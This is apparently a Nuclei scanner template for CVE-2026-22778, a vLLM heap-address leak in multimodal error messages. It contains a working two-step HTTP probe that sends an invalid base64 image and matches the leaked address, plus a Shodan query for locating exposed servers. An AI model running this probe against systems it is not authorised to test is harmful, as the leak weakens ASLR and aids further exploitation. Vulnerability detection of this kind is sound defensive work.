id: CVE-2026-22778 info: name: vLLM 0.8.3 - 0.14.0 - Information Disclosure author: kenlacroix severity: critical description: | vLLM 0.8.3 to - 0.14.1 contains an information disclosure caused by leaking a heap address in error messages from the multimodal endpoint when processing invalid images, letting remote attackers reduce ASLR entropy, exploit requires sending invalid images. impact: | Remote attackers can leak heap addresses, significantly reducing ASLR effectiveness and enabling further exploitation like remote code execution. remediation: | Upgrade to version 0.14.1 or later. reference: - https://github.com/vllm-project/vllm/security/advisories/GHSA-4r2x-xpjr-7cvv - https://orca.security/resources/blog/cve-2026-22778-vllm-rce-vulnerability/ - https://nvd.nist.gov/vuln/detail/CVE-2026-22778 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2026-22778 epss-score: 0.03816 epss-percentile: 0.88856 cwe-id: CWE-209 metadata: verified: true max-request: 2 vendor: vllm product: vllm shodan-query: http.html:"/v1/models" http.html:"vllm" tags: cve,cve2026,vllm,llm,ai,disclosure,exposure,intrusive flow: http(1) && http(2) http: - raw: - | GET /v1/models HTTP/1.1 Host: {{Hostname}} Accept: application/json matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(body, "\"id\":")' condition: and internal: true extractors: - type: regex name: model part: body internal: true group: 1 regex: - '"id"\s*:\s*"([^"]+)"' - raw: - | POST /v1/chat/completions HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"model":"{{model}}","messages":[{"role":"user","content":[{"type":"text","text":"{{randstr}}"},{"type":"image_url","image_url":{"url":"data:image/png;base64,bm90YW5pbWFnZQ=="}}]}],"max_tokens":1} matchers: - type: dsl dsl: - 'status_code == 400' - 'contains(body, "_io.BytesIO object at 0x")' condition: and # digest: 4a0a00473045022100c45160f66a3f7d4e690f3e02aaaf078624d8f2189fae76f6bfb616b058728aa8022034613b5e6a66b1969908f425c35b4785456054229b16a8aba016bcb850321dbc:922c64590222798bb761d5b6d8e72950